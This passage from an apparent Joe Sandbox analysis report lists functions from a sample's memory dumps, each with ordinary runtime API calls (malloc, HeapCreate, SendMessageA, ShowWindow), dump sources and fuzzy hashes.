                                                                                                                                      • Associated: 00000002.00000002.4793863028.0000000069E80000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4795599242.0000000069EDA000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EED000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EF1000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EF6000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796417453.0000000069EF8000.00000020.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796635921.0000000069F04000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797586711.0000000069F44000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797638432.0000000069F45000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797741855.0000000069F4A000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797786351.0000000069F4B000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798016442.0000000069F5A000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798062740.0000000069F5B000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798104542.0000000069F5C000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_69e80000_DC1FFAF.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 278adcfdca88e0036a16904069aa96a53b461d8be5fb238c23626c4c70b15c28
                                                                                                                                      • Instruction ID: ff5ed91f77e481d8bf2526e026b23ed527113a286d33daac4c14798230e52544
                                                                                                                                      • Opcode Fuzzy Hash: 278adcfdca88e0036a16904069aa96a53b461d8be5fb238c23626c4c70b15c28
                                                                                                                                      • Instruction Fuzzy Hash: 3AE0DF72014305ABCB198E6C9B015CA37E85B033B6F30572AE174CB2C8DA30A483AB90
                                                                                                                                      Function 00436410 Relevance: 1.5, APIs: 1, Instructions: 24windowCOMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      • SendMessageA.USER32(?,00000030,?,00000000), ref: 0043643F
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.4595660079.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_401000_DC1FFAF.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: MessageSend
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 3850602802-0
                                                                                                                                      • Opcode ID: 1aa98dab3c4d90004b35f6ffeca34c55846aa9c0e68dfb0e7a5a0112d10e4690
                                                                                                                                      • Instruction ID: 4d58c3c8737256904e75260f7aa1d672b2bee2a97ce5a573781d1a153d87f0c3
                                                                                                                                      • Opcode Fuzzy Hash: 1aa98dab3c4d90004b35f6ffeca34c55846aa9c0e68dfb0e7a5a0112d10e4690
                                                                                                                                      • Instruction Fuzzy Hash: 39F0C074E00108EFD704EF94D955EADF7B5EB48700F1081EEE91967391D6356E10CB94
                                                                                                                                      Function 69ECA608 Relevance: 1.5, APIs: 1, Instructions: 23COMMONLIBRARYCODE
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      • __flsbuf.LIBCMT ref: 69ECA629
                                                                                                                                        • Part of subcall function 69EC8F1F: __fileno.LIBCMT ref: 69EC8F2A
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.4794015728.0000000069E81000.00000020.00000001.01000000.00000012.sdmp, Offset: 69E80000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.4793863028.0000000069E80000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4795599242.0000000069EDA000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EED000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EF1000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EF6000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796417453.0000000069EF8000.00000020.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796635921.0000000069F04000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797586711.0000000069F44000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797638432.0000000069F45000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797741855.0000000069F4A000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797786351.0000000069F4B000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798016442.0000000069F5A000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798062740.0000000069F5B000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798104542.0000000069F5C000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_69e80000_DC1FFAF.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: __fileno__flsbuf
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 3539722517-0
                                                                                                                                      • Opcode ID: 10c1eb676a31cfd617763de1cb7959e68859eb87d5ff9a86a91ff01ebc0a6b8a
                                                                                                                                      • Instruction ID: 6fca43e89ff5140b037ea7e2c18a8c4e5ba5adafe0e4c78ffdfb2824cfdaa693
                                                                                                                                      • Opcode Fuzzy Hash: 10c1eb676a31cfd617763de1cb7959e68859eb87d5ff9a86a91ff01ebc0a6b8a
                                                                                                                                      • Instruction Fuzzy Hash: E8E01A70085540DADB114A20D2496217BA4AB1273DF3486CEE6F58A3E2C73A8047DA62
                                                                                                                                      Function 69EAF32B Relevance: 1.5, APIs: 1, Instructions: 23COMMONLIBRARYCODE
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      • _malloc.LIBCMT ref: 69EAF349
                                                                                                                                        • Part of subcall function 69EBED6C: __FF_MSGBANNER.LIBCMT ref: 69EBED8F
                                                                                                                                        • Part of subcall function 69EBED6C: __NMSG_WRITE.LIBCMT ref: 69EBED96
                                                                                                                                        • Part of subcall function 69EBED6C: RtlAllocateHeap.NTDLL(00000000,?,00000001,00000000,00000000,?,69EC8DFF,?,00000001,?,?,69EC7CE7,00000018,69EE8F08,0000000C,69EC7D78), ref: 69EBEDE3
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.4794015728.0000000069E81000.00000020.00000001.01000000.00000012.sdmp, Offset: 69E80000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.4793863028.0000000069E80000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4795599242.0000000069EDA000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EED000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EF1000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EF6000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796417453.0000000069EF8000.00000020.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796635921.0000000069F04000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797586711.0000000069F44000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797638432.0000000069F45000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797741855.0000000069F4A000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797786351.0000000069F4B000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798016442.0000000069F5A000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798062740.0000000069F5B000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798104542.0000000069F5C000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_69e80000_DC1FFAF.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: AllocateHeap_malloc
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 501242067-0
                                                                                                                                      • Opcode ID: eeecce3e54a982add201667d130d0e900526daf8a4fd8bb232b589d072208856
                                                                                                                                      • Instruction ID: 065f6ee40319e4e826332490ad78f81c47128265530b59da1be8daa2382c7159
                                                                                                                                      • Opcode Fuzzy Hash: eeecce3e54a982add201667d130d0e900526daf8a4fd8bb232b589d072208856
                                                                                                                                      • Instruction Fuzzy Hash: 09D02B376055166B5F014B99DC00759775DEB81AF93244435F914CF221EF25DC0293C0
                                                                                                                                      Function 00402CD0 Relevance: 1.5, APIs: 1, Instructions: 23memoryCOMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      • _DebugHeapAllocator.LIBCPMTD ref: 00402CDE
                                                                                                                                        • Part of subcall function 004041C0: std::_String_base::_Xlen.LIBCPMT ref: 004041D6
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.4595660079.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_401000_DC1FFAF.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: AllocatorDebugHeapString_base::_Xlenstd::_
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 1506555658-0
                                                                                                                                      • Opcode ID: 93a50c6262a8430e6a2d90e0e2b561865d5c98d9ac9399956599d3cb56062f7d
                                                                                                                                      • Instruction ID: 434746002332c5aaa9a2c49bdf42743d7a810f47cb16a697fc5c69fad7b2afbe
                                                                                                                                      • Opcode Fuzzy Hash: 93a50c6262a8430e6a2d90e0e2b561865d5c98d9ac9399956599d3cb56062f7d
                                                                                                                                      • Instruction Fuzzy Hash: 0CE0E5B1B10108FBC708DB85ED52FAEB7B9AB88700F10416DBA056B290CA716E009B98
                                                                                                                                      Function 0043F170 Relevance: 1.5, APIs: 1, Instructions: 23windowCOMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      • SendMessageA.USER32(?,00000030,?,00000000), ref: 0043F19B
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.4595660079.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_401000_DC1FFAF.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: MessageSend
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 3850602802-0
                                                                                                                                      • Opcode ID: b185962f4326dd1e29583313ce858644e7ea6f233f9a1ded8c72063b0ca6ced6
                                                                                                                                      • Instruction ID: 2d3517846861e223e00f56f0ae1a71bd1becabe36baaefb3640b70120cee9964
                                                                                                                                      • Opcode Fuzzy Hash: b185962f4326dd1e29583313ce858644e7ea6f233f9a1ded8c72063b0ca6ced6
                                                                                                                                      • Instruction Fuzzy Hash: 98F0ED78E04208EFDB04EFA8D855EAEB7B8FB48304F1085AAE915A7351D7346E10DB94
                                                                                                                                      Function 00422E40 Relevance: 1.5, APIs: 1, Instructions: 23windowCOMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      • PeekMessageA.USER32(?,?,00000000,00000000,00000000,00000001), ref: 00422E53
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.4595660079.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_401000_DC1FFAF.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: MessagePeek
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 2222842502-0
                                                                                                                                      • Opcode ID: f625f5e448101f2e1afa0dff1344ab92571ba7b52a9cfed96809d624d7f77332
                                                                                                                                      • Instruction ID: b718cecd9bea78dab8ba6611cf5d7d5a97ae1494a56e5f1b5ee0f52ca6f89898
                                                                                                                                      • Opcode Fuzzy Hash: f625f5e448101f2e1afa0dff1344ab92571ba7b52a9cfed96809d624d7f77332
                                                                                                                                      • Instruction Fuzzy Hash: 51E01261B5020976E520B6E4AD43FBA726C5B20700F8041517A05A91C2E9D9941292E5
                                                                                                                                      Function 0046DE74 Relevance: 1.5, APIs: 1, Instructions: 23COMMONLIBRARYCODE
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      • _malloc.LIBCMT ref: 0046DE92
                                                                                                                                        • Part of subcall function 004983AD: __FF_MSGBANNER.LIBCMT ref: 004983D0
                                                                                                                                        • Part of subcall function 004983AD: __NMSG_WRITE.LIBCMT ref: 004983D7
                                                                                                                                        • Part of subcall function 004983AD: RtlAllocateHeap.NTDLL(00000000,?,00000001,00000000,00000000,?,004A296A,?,00000001,?,?,004A1322,00000018,00516498,0000000C,004A13B3), ref: 00498424
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.4595660079.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_401000_DC1FFAF.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: AllocateHeap_malloc
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 501242067-0
                                                                                                                                      • Opcode ID: 115daffd46f8bc784ec3115bef4c1d161862200f3fae26edc74629f2d0a19260
                                                                                                                                      • Instruction ID: 11dcbb72e65268d7a814467625c09487057680d8433f68bbe75fa91f4f3e9b00
                                                                                                                                      • Opcode Fuzzy Hash: 115daffd46f8bc784ec3115bef4c1d161862200f3fae26edc74629f2d0a19260
                                                                                                                                      • Instruction Fuzzy Hash: 4ED01232F06A19675B215699EC0059B7A599B51BA0314403ABD08DE254EA16CC0192D9
                                                                                                                                      Function 004659E0 Relevance: 1.5, APIs: 1, Instructions: 21COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.4595660079.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_401000_DC1FFAF.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: __wfopen_s
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 4066576132-0
                                                                                                                                      • Opcode ID: 50d0e1940491b95c80d40bee3e7cf5630284587ddc98e803c37a6148a181defa
                                                                                                                                      • Instruction ID: 50d5855c9684f3e13777f4d8d7f866b2b50ce45780102204052baa60bb38f099
                                                                                                                                      • Opcode Fuzzy Hash: 50d0e1940491b95c80d40bee3e7cf5630284587ddc98e803c37a6148a181defa
                                                                                                                                      • Instruction Fuzzy Hash: 48E04FB5D0020CABDF10FBD4DD46B9DBB789B01308F2001AAE90563281E77A6B58879A
                                                                                                                                      Function 69EC8854 Relevance: 1.5, APIs: 1, Instructions: 20memoryCOMMONLIBRARYCODE
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      • HeapCreate.KERNEL32(00000000,00001000,00000000,?,69EC337B,?), ref: 69EC8869
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.4794015728.0000000069E81000.00000020.00000001.01000000.00000012.sdmp, Offset: 69E80000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.4793863028.0000000069E80000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4795599242.0000000069EDA000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EED000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EF1000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EF6000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796417453.0000000069EF8000.00000020.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796635921.0000000069F04000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797586711.0000000069F44000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797638432.0000000069F45000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797741855.0000000069F4A000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797786351.0000000069F4B000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798016442.0000000069F5A000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798062740.0000000069F5B000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798104542.0000000069F5C000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_69e80000_DC1FFAF.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: CreateHeap
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 10892065-0
                                                                                                                                      • Opcode ID: 6aab4994473200b3f0a78a6deecd088e10d29b35878ba59ae198fbd404568845
                                                                                                                                      • Instruction ID: ba7096897a019ff701f305b6d6ecd9f8cac2249e98bd9cf75a6bda8cd6714669
                                                                                                                                      • Opcode Fuzzy Hash: 6aab4994473200b3f0a78a6deecd088e10d29b35878ba59ae198fbd404568845
                                                                                                                                      • Instruction Fuzzy Hash: 19D05E72998784AEEF015E756D097223BEC93893A5F104476F95CC6240E674C640CA00
                                                                                                                                      Function 69EB06F0 Relevance: 1.5, APIs: 1, Instructions: 20COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      • InterlockedExchange.KERNEL32(69EF2A38,?), ref: 69EB0719
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.4794015728.0000000069E81000.00000020.00000001.01000000.00000012.sdmp, Offset: 69E80000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.4793863028.0000000069E80000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4795599242.0000000069EDA000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EED000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EF1000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EF6000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796417453.0000000069EF8000.00000020.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796635921.0000000069F04000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797586711.0000000069F44000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797638432.0000000069F45000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797741855.0000000069F4A000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797786351.0000000069F4B000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798016442.0000000069F5A000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798062740.0000000069F5B000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798104542.0000000069F5C000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_69e80000_DC1FFAF.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: ExchangeInterlocked
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 367298776-0
                                                                                                                                      • Opcode ID: bad3fce8294e6b5727910e4f2c8eaa2767087f1338758a69bd162b41acdf4626
                                                                                                                                      • Instruction ID: f8bd6be63b41b8eb51128d42b7ca89da8524327ea0185934ab48fb9d6c470a0c
                                                                                                                                      • Opcode Fuzzy Hash: bad3fce8294e6b5727910e4f2c8eaa2767087f1338758a69bd162b41acdf4626
                                                                                                                                      • Instruction Fuzzy Hash: 18E01235610A909FD721AF79E50C95A77E5EF4D2217114469F5A2C7368DB32EC018F50
                                                                                                                                      Function 004A8ADC Relevance: 1.5, APIs: 1, Instructions: 18COMMONLIBRARYCODE
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                        • Part of subcall function 004A1398: __mtinitlocknum.LIBCMT ref: 004A13AE
                                                                                                                                        • Part of subcall function 004A1398: __amsg_exit.LIBCMT ref: 004A13BA
                                                                                                                                      • __tzset_nolock.LIBCMT ref: 004A8B05
                                                                                                                                        • Part of subcall function 004A83C7: __get_daylight.LIBCMT ref: 004A83FE
                                                                                                                                        • Part of subcall function 004A83C7: __get_daylight.LIBCMT ref: 004A8419
                                                                                                                                        • Part of subcall function 004A83C7: __get_daylight.LIBCMT ref: 004A8434
                                                                                                                                        • Part of subcall function 004A83C7: ____lc_codepage_func.LIBCMT ref: 004A844B
                                                                                                                                        • Part of subcall function 004A83C7: __getenv_helper_nolock.LIBCMT ref: 004A846D
                                                                                                                                        • Part of subcall function 004A83C7: _strlen.LIBCMT ref: 004A84AB
                                                                                                                                        • Part of subcall function 004A83C7: _strlen.LIBCMT ref: 004A84C8
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.4595660079.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_401000_DC1FFAF.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: __get_daylight$_strlen$____lc_codepage_func__amsg_exit__getenv_helper_nolock__mtinitlocknum__tzset_nolock
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 416741384-0
                                                                                                                                      • Opcode ID: 9090c8bc425a5ffeae60e9ff55ca2333fe71ec4da4aeee8fb7a5eb741aa5b826
                                                                                                                                      • Instruction ID: 2ce55e552c917227906d9e1c62ac9879c3e1abb74cc79d25e84630d12debfa19
                                                                                                                                      • Opcode Fuzzy Hash: 9090c8bc425a5ffeae60e9ff55ca2333fe71ec4da4aeee8fb7a5eb741aa5b826
                                                                                                                                      • Instruction Fuzzy Hash: 71E02CB498231092CB22BBB0091219CBA24EBB6B28F80402FB80006092CEB80850A638
                                                                                                                                      Function 004631B0 Relevance: 1.5, APIs: 1, Instructions: 15COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.4595660079.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_401000_DC1FFAF.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: _malloc
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 1579825452-0
                                                                                                                                      • Opcode ID: f9d0c350f9484a50f6a86e4402cecc8b7fcb459b3b202075472149330790c4b9
                                                                                                                                      • Instruction ID: 4ff9dc0e9d7026eb89c9efe439d002b3400f02b1de43586ee1226812d96c11e5
                                                                                                                                      • Opcode Fuzzy Hash: f9d0c350f9484a50f6a86e4402cecc8b7fcb459b3b202075472149330790c4b9
                                                                                                                                      • Instruction Fuzzy Hash: 93D017B200024D9BCF08DF59C985AAA37A8BB00324F04842ABC2C4A240DA39E660CF45
                                                                                                                                      Function 00474A51 Relevance: 1.5, APIs: 1, Instructions: 15COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      • KiUserCallbackDispatcher.NTDLL(00000000,?,?,?,00426D17,00000000), ref: 00474A63
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.4595660079.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_401000_DC1FFAF.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: CallbackDispatcherUser
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 2492992576-0
                                                                                                                                      • Opcode ID: b9d7ef58b7c66ec5cf68394825ec9449a87460ff397cfcad344dfca886133eb0
                                                                                                                                      • Instruction ID: 81feaeccb34c6073d8fbaa1e2ceac339a526bba51a642701df79a757305369fd
                                                                                                                                      • Opcode Fuzzy Hash: b9d7ef58b7c66ec5cf68394825ec9449a87460ff397cfcad344dfca886133eb0
                                                                                                                                      • Instruction Fuzzy Hash: FAD0A772140208EFEB00DB80C408F7677A9BB94314F1040E9E50C0F912CB33D462CB44
                                                                                                                                      Function 00474A0F Relevance: 1.5, APIs: 1, Instructions: 14COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      • ShowWindow.USER32(6A51DC4D,?,?,00432E02,00000005), ref: 00474A20
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.4595660079.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_401000_DC1FFAF.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: ShowWindow
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 1268545403-0
                                                                                                                                      • Opcode ID: 930c704ab7d9e4f52ea7264663bdbde0f460c8084f28171e48f52a6a739bbe63
                                                                                                                                      • Instruction ID: 429d77808932d40572929994353350674fce3db7a5932b19c457718700623114
                                                                                                                                      • Opcode Fuzzy Hash: 930c704ab7d9e4f52ea7264663bdbde0f460c8084f28171e48f52a6a739bbe63
                                                                                                                                      • Instruction Fuzzy Hash: C1D09E72144648DFD7048F44D408BB537A5FB98326F5040A9E5494E521C7379872DB44
                                                                                                                                      Function 69EBF2AE Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.4794015728.0000000069E81000.00000020.00000001.01000000.00000012.sdmp, Offset: 69E80000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.4793863028.0000000069E80000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4795599242.0000000069EDA000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EED000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EF1000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EF6000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796417453.0000000069EF8000.00000020.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796635921.0000000069F04000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797586711.0000000069F44000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797638432.0000000069F45000.00000080.00000001.01000000.00000012.sdmpDownload File
